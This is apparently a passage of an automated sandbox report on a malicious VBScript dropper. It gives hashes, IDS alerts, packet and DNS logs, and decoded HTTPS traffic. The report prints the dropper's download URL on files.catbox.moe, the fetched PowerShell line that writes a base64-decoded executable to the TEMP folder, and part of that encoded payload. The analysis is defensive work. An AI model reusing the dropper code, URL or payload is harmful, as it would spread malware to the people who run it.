                                                  SHA256:51faf4a204e0fafc59933beab6d6702e337b10218bf11b1ec81fe50a278d3bb2
                                                  SHA512:4e76d91d068d1d21188f5d066050dac5c65079753659b3e892ecad6311c98ea485ed1b73e7a8814ba545298a449a1378df0c49eb87ac5411afa4675cb821992a
                                                  SSDEEP:48:ICtviLaREIYR2ynhmkfjyJKcy0yyAQJGrn/p9rKJVgXv03JUsLeREU:ICtGIghmSyJKarHJGr/p92JO8Z/Le6U
                                                  TLSH:6E61C737BE07C330087B4E4D896FE05ECA10105B62188470BA4C81C6BF366BDEAA52CE
                                                  File Content Preview:' Constants to avoid magic strings..Const URL = "https://files.catbox.moe/qrz18p.ps1"..Const DownloadPath = "C:\Temp\dddddd.ps1"..Const TEMP_DIR = "C:\Temp"..Const SUCCESS_STATUS = 200....' Secure PowerShell execution policy and command..Const POWERSHELL_

                                                  File Icon

                                                  Icon Hash:68d69b8f86ab9a86

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2025-01-16T08:29:19.622332+01002827578ETPRO MALWARE Likely Dropper Doc GET to .moe TLD1192.168.2.849706108.181.20.35443TCP
                                                  2025-01-16T08:29:19.709247+01002018856ET MALWARE Windows executable base64 encoded1108.181.20.35443192.168.2.849706TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 16, 2025 08:29:18.535577059 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:18.535670996 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:18.535757065 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:18.546555996 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:18.546603918 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.316442013 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.316554070 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.368616104 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.368674994 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.369117022 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.369348049 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.371959925 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.415358067 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.622570992 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.622618914 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.622637987 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.622674942 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.622754097 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.622793913 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.622876883 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.623821974 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.623837948 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.623914957 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.623930931 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.624181032 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.708806038 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.708832979 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.708969116 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.709021091 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.709075928 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.709247112 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.709261894 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.709319115 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.709333897 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.709388971 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.711070061 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.711086035 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.711149931 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.711163044 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.711210966 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.712085009 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.712100983 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.712167025 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.712178946 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.712229967 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.795834064 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.795861006 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.795983076 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.796006918 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.796050072 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.796605110 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.796619892 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.796772003 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.796799898 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.796844959 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.797238111 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.797252893 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.797328949 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.797333956 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.797375917 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.798192978 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.798211098 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.798271894 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.798276901 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.798316956 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.798993111 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.799007893 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.799073935 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.799078941 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.799120903 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.799973965 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.799993992 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.800056934 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.800061941 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.800522089 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.860754967 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.860780954 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.860940933 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.861011982 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.861079931 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.882826090 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.882848978 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.882899046 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.882942915 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.882985115 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.883008957 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.883040905 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.883066893 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.883737087 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.883755922 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.883830070 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.883845091 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.883903027 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.884453058 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.884470940 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.884546041 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.884557962 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.884613037 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.887537956 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.887559891 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.887676954 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.887690067 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.887748957 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.888216972 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.888236046 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.888307095 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.888318062 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.888365984 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.907202005 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.907224894 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.907382965 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.907398939 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.907470942 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.969361067 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.969389915 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.969518900 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.969557047 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.969703913 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.969703913 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.969759941 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.969903946 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.969918966 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.969986916 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.970009089 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.970067024 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.970115900 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.970129967 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.970189095 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.970201015 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.970256090 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.970607996 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.970623016 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.970706940 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.970721006 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.970765114 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.970772028 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.970782995 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.970794916 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.970838070 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.970885038 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.971152067 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.971169949 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.971210957 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.971235991 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.971247911 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.971266985 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.971291065 CET44349706108.181.20.35192.168.2.8
                                                  Jan 16, 2025 08:29:19.971295118 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.971354961 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.971651077 CET49706443192.168.2.8108.181.20.35
                                                  Jan 16, 2025 08:29:19.971683979 CET44349706108.181.20.35192.168.2.8

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 16, 2025 08:29:18.521274090 CET6148053192.168.2.81.1.1.1
                                                  Jan 16, 2025 08:29:18.528206110 CET53614801.1.1.1192.168.2.8

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jan 16, 2025 08:29:18.521274090 CET192.168.2.81.1.1.10x173cStandard query (0)files.catbox.moeA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jan 16, 2025 08:29:18.528206110 CET1.1.1.1192.168.2.80x173cNo error (0)files.catbox.moe108.181.20.35A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • files.catbox.moe

                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.849706108.181.20.354435212C:\Windows\System32\wscript.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-16 07:29:19 UTC330OUTGET /qrz18p.ps1 HTTP/1.1
                                                  Accept: */*
                                                  Accept-Language: en-ch
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                  Host: files.catbox.moe
                                                  Connection: Keep-Alive
                                                  2025-01-16 07:29:19 UTC551INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Thu, 16 Jan 2025 07:29:19 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 451364
                                                  Last-Modified: Wed, 15 Jan 2025 23:34:38 GMT
                                                  Connection: close
                                                  ETag: "6788460e-6e324"
                                                  X-Content-Type-Options: nosniff
                                                  Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET, HEAD
                                                  Accept-Ranges: bytes
                                                  2025-01-16 07:29:19 UTC15833INData Raw: 24 70 3d 5b 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 22 78 2e 65 78 65 22 29 0d 0a 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 70 2c 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75
                                                  Data Ascii: $p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu
                                                  2025-01-16 07:29:19 UTC16384INData Raw: 59 70 52 32 51 4f 41 69 79 63 62 44 49 74 66 68 4e 32 45 74 31 51 58 6f 6d 7a 55 54 78 72 34 74 53 38 6e 35 51 73 72 51 33 38 54 38 67 56 56 63 4c 6c 45 34 31 45 63 69 66 67 4a 68 47 7a 63 75 71 36 58 6d 36 44 50 4a 32 39 59 6f 59 2b 35 45 4b 5a 4d 2f 63 69 43 6f 59 49 5a 47 78 79 43 38 59 37 49 42 70 30 30 65 55 69 37 45 6b 4e 56 4b 53 2b 72 78 66 51 37 64 64 78 7a 71 2b 70 6b 31 61 35 34 4e 53 30 62 33 50 38 35 47 70 4f 6d 4f 52 74 2b 31 39 46 72 37 57 52 4c 68 68 79 67 69 37 32 63 74 44 34 69 50 72 42 62 72 6d 32 4d 5a 58 71 52 6f 50 7a 62 31 57 59 34 54 4c 79 62 77 71 41 4e 69 4f 7a 77 54 4c 4f 66 35 53 56 4e 6e 79 4e 47 4e 34 73 49 50 36 4a 77 45 59 75 43 47 38 4a 4d 55 46 4e 56 4c 6f 75 34 31 71 4f 48 45 6a 6e 58 6c 69 4e 46 4d 41 59 46 77 38 75 76
                                                  Data Ascii: YpR2QOAiycbDItfhN2Et1QXomzUTxr4tS8n5QsrQ38T8gVVcLlE41EcifgJhGzcuq6Xm6DPJ29YoY+5EKZM/ciCoYIZGxyC8Y7IBp00eUi7EkNVKS+rxfQ7ddxzq+pk1a54NS0b3P85GpOmORt+19Fr7WRLhhygi72ctD4iPrBbrm2MZXqRoPzb1WY4TLybwqANiOzwTLOf5SVNnyNGN4sIP6JwEYuCG8JMUFNVLou41qOHEjnXliNFMAYFw8uv
                                                  2025-01-16 07:29:19 UTC16384INData Raw: 71 4b 68 42 6d 41 6b 56 77 2f 6a 35 58 74 58 47 2b 4d 37 55 73 71 64 48 73 55 70 6e 4b 31 51 41 53 4d 56 41 61 45 4a 59 79 51 6f 56 4f 79 72 55 55 30 4c 6c 61 61 62 68 35 74 39 59 4a 78 39 32 57 52 56 76 34 54 4b 31 61 34 76 65 45 63 6d 4e 39 71 5a 79 57 39 74 62 66 70 79 5a 61 6f 56 31 4e 46 45 48 62 72 30 59 38 6a 52 43 43 68 4d 51 61 73 69 50 34 71 50 75 34 6b 52 53 53 48 58 66 57 36 44 4d 61 56 5a 4a 47 56 46 41 6f 5a 34 63 38 4c 48 42 31 75 6b 56 75 6e 31 38 4d 4c 51 55 66 55 2b 66 47 54 71 74 50 31 61 30 33 30 56 41 63 6d 77 4a 43 61 66 68 52 5a 49 6e 2b 47 79 68 78 77 69 79 4b 46 6e 4f 64 59 2f 2b 6b 51 39 78 75 55 67 71 4b 75 72 71 54 7a 42 4f 76 7a 7a 43 41 6d 78 58 4a 49 4a 50 35 53 4b 46 71 63 63 63 55 78 4f 59 2b 54 5a 67 44 42 52 36 55 44 77
                                                  Data Ascii: qKhBmAkVw/j5XtXG+M7UsqdHsUpnK1QASMVAaEJYyQoVOyrUU0Llaabh5t9YJx92WRVv4TK1a4veEcmN9qZyW9tbfpyZaoV1NFEHbr0Y8jRCChMQasiP4qPu4kRSSHXfW6DMaVZJGVFAoZ4c8LHB1ukVun18MLQUfU+fGTqtP1a030VAcmwJCafhRZIn+GyhxwiyKFnOdY/+kQ9xuUgqKurqTzBOvzzCAmxXJIJP5SKFqcccUxOY+TZgDBR6UDw
                                                  2025-01-16 07:29:19 UTC16384INData Raw: 4c 36 66 58 46 5a 74 38 5a 46 64 4f 4e 66 51 6b 34 37 41 32 2b 52 6c 69 44 78 59 79 45 69 46 61 66 2b 48 44 51 70 64 4e 67 36 6b 6c 72 5a 43 39 33 4c 68 67 6c 32 75 4b 74 70 63 57 30 71 37 45 6e 73 6b 62 52 4d 74 2b 6c 6e 2f 39 6c 61 54 61 49 38 7a 55 35 7a 6f 6d 6d 37 31 7a 52 51 55 47 55 71 31 65 34 62 4d 41 33 32 59 4f 71 78 6c 62 55 31 52 37 62 45 78 35 78 52 62 55 4a 45 33 51 6c 31 78 2b 61 6a 68 6b 7a 36 72 58 48 49 76 62 68 30 76 4d 6c 32 53 76 6d 53 44 77 61 44 6d 30 54 36 44 61 48 76 48 4d 64 53 47 6c 6a 41 44 44 61 78 55 4e 75 6e 70 38 66 30 71 4e 38 49 4b 7a 72 66 75 72 6e 65 6b 31 64 50 44 43 61 75 62 75 33 33 69 7a 54 71 33 51 78 55 32 39 54 79 67 56 53 33 78 6e 6f 42 4f 4b 6d 64 52 5a 59 74 45 62 67 7a 65 65 79 77 4e 50 72 57 76 6c 36 51 52
                                                  Data Ascii: L6fXFZt8ZFdONfQk47A2+RliDxYyEiFaf+HDQpdNg6klrZC93Lhgl2uKtpcW0q7EnskbRMt+ln/9laTaI8zU5zomm71zRQUGUq1e4bMA32YOqxlbU1R7bEx5xRbUJE3Ql1x+ajhkz6rXHIvbh0vMl2SvmSDwaDm0T6DaHvHMdSGljADDaxUNunp8f0qN8IKzrfurnek1dPDCaubu33izTq3QxU29TygVS3xnoBOKmdRZYtEbgzeeywNPrWvl6QR
                                                  2025-01-16 07:29:19 UTC16384INData Raw: 36 31 4c 7a 53 6c 67 6d 4e 39 37 46 2f 62 58 59 78 41 43 57 66 42 63 62 65 54 52 6e 49 67 6d 4c 4b 33 2f 6d 4d 48 38 45 53 51 66 70 65 55 71 42 6a 53 36 4c 4b 7a 72 41 72 4c 49 65 59 44 46 47 4f 4a 35 59 68 76 59 2f 50 45 35 65 69 64 49 65 4d 35 33 65 5a 64 42 67 39 2f 2b 39 6f 4f 4f 62 47 59 7a 38 43 38 74 63 62 33 66 66 31 70 45 6b 51 38 64 2f 65 38 70 50 66 38 72 33 50 2f 65 42 59 47 78 2f 36 4f 56 59 53 39 6f 42 4c 79 49 69 65 66 6e 36 32 41 58 72 37 73 68 55 5a 42 39 75 52 56 57 74 75 62 45 59 39 72 48 4e 44 72 44 2b 53 6a 66 47 38 4f 55 72 2f 4d 67 74 43 4e 62 5a 50 47 54 35 65 4a 55 32 4d 4f 72 75 74 78 64 33 41 4f 75 36 75 34 32 4e 69 36 39 7a 38 4b 53 63 31 33 58 38 4e 76 70 77 55 41 6f 52 6b 31 62 35 2b 39 34 44 74 6c 66 42 4c 70 4d 72 33 55 37
                                                  Data Ascii: 61LzSlgmN97F/bXYxACWfBcbeTRnIgmLK3/mMH8ESQfpeUqBjS6LKzrArLIeYDFGOJ5YhvY/PE5eidIeM53eZdBg9/+9oOObGYz8C8tcb3ff1pEkQ8d/e8pPf8r3P/eBYGx/6OVYS9oBLyIiefn62AXr7shUZB9uRVWtubEY9rHNDrD+SjfG8OUr/MgtCNbZPGT5eJU2MOrutxd3AOu6u42Ni69z8KSc13X8NvpwUAoRk1b5+94DtlfBLpMr3U7
                                                  2025-01-16 07:29:19 UTC16384INData Raw: 52 4c 76 75 44 55 58 49 77 54 36 35 4e 2f 5a 7a 6b 33 69 56 2f 67 33 4e 4e 36 37 48 4f 6e 69 73 57 76 59 71 69 37 48 79 65 72 51 64 2f 2f 65 4c 42 7a 52 75 6d 73 58 77 6a 55 6a 61 75 4d 2f 51 41 64 32 53 34 6a 68 77 35 39 31 51 37 58 2b 75 49 6c 36 62 2f 37 35 53 45 57 6c 77 6e 46 56 4f 59 4d 4f 52 30 58 6e 5a 6d 66 6e 4a 66 43 43 32 42 37 46 4c 64 50 4a 34 34 4f 4e 65 58 58 47 69 78 36 33 62 46 4b 30 70 54 77 34 38 53 44 53 6b 6c 59 36 4b 42 77 58 54 34 56 35 4f 30 79 70 5a 76 57 51 4c 4f 6e 32 47 6c 4b 4d 32 6e 2f 78 6e 6a 50 55 52 6e 77 2f 4d 45 6f 69 39 64 34 34 7a 61 6b 4c 58 51 7a 43 79 46 35 75 49 6e 72 6e 4a 7a 42 61 64 61 33 55 48 34 2b 43 7a 6b 61 7a 71 42 31 36 39 32 44 4c 67 34 48 57 68 73 49 47 55 77 33 39 75 65 54 6a 77 65 64 38 38 52 53 67
                                                  Data Ascii: RLvuDUXIwT65N/Zzk3iV/g3NN67HOnisWvYqi7HyerQd//eLBzRumsXwjUjauM/QAd2S4jhw591Q7X+uIl6b/75SEWlwnFVOYMOR0XnZmfnJfCC2B7FLdPJ44ONeXXGix63bFK0pTw48SDSklY6KBwXT4V5O0ypZvWQLOn2GlKM2n/xnjPURnw/MEoi9d44zakLXQzCyF5uInrnJzBada3UH4+CzkazqB1692DLg4HWhsIGUw39ueTjwed88RSg
                                                  2025-01-16 07:29:19 UTC16384INData Raw: 71 42 58 58 54 67 53 4f 72 62 34 64 69 41 70 4e 53 39 6b 6c 36 33 50 5a 7a 50 76 4d 6c 30 43 58 33 31 56 4a 53 71 77 53 4d 72 2f 33 69 43 4a 2f 4b 4f 43 59 63 69 6f 6e 2b 6a 2b 6f 53 45 48 4a 33 69 74 42 32 48 61 36 4e 56 4e 44 77 68 6f 6a 65 36 6b 52 34 76 4c 65 7a 73 47 50 78 45 57 6a 65 64 73 38 4f 31 49 4f 5a 51 6c 78 6e 38 33 4e 74 35 4e 66 75 69 58 50 57 58 52 36 35 53 70 62 4e 38 66 41 69 48 66 31 4c 73 73 78 56 6e 35 76 76 49 32 6f 34 4b 77 36 30 42 57 6b 5a 6f 69 4e 79 4f 6c 38 45 50 45 7a 48 35 68 57 6d 72 42 6b 48 39 65 58 35 6d 72 72 51 4a 36 51 38 77 6a 63 72 33 31 68 44 5a 69 70 57 59 73 6e 4f 6b 35 50 46 38 4b 30 2f 38 4c 45 42 4a 4e 45 48 52 6c 47 4c 42 36 66 35 53 5a 55 67 6b 74 78 30 4d 46 51 72 69 4b 6c 50 52 36 6b 4e 7a 67 6b 64 36 66
                                                  Data Ascii: qBXXTgSOrb4diApNS9kl63PZzPvMl0CX31VJSqwSMr/3iCJ/KOCYcion+j+oSEHJ3itB2Ha6NVNDwhoje6kR4vLezsGPxEWjeds8O1IOZQlxn83Nt5NfuiXPWXR65SpbN8fAiHf1LssxVn5vvI2o4Kw60BWkZoiNyOl8EPEzH5hWmrBkH9eX5mrrQJ6Q8wjcr31hDZipWYsnOk5PF8K0/8LEBJNEHRlGLB6f5SZUgktx0MFQriKlPR6kNzgkd6f
